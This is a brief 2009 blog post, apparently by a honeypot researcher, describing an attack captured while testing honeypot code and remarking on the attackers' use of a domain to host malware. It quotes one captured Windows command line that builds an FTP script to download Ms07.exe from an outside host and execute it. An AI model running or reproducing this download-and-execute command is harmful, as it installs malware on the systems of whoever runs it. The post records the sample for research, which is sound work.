Iteolih: If you can't touch it ...

21 Jul 2009 Markus Koetter ftp iteolih

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.
cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe
The offer to download something was not that unexpected, we are working hard to get these offers, so we can grab copies of something, but the location was interesting. Obviously they decided to go for a central service to deploy their malware, and to indicate that level of professionalism on first sight, they use(d) a domain.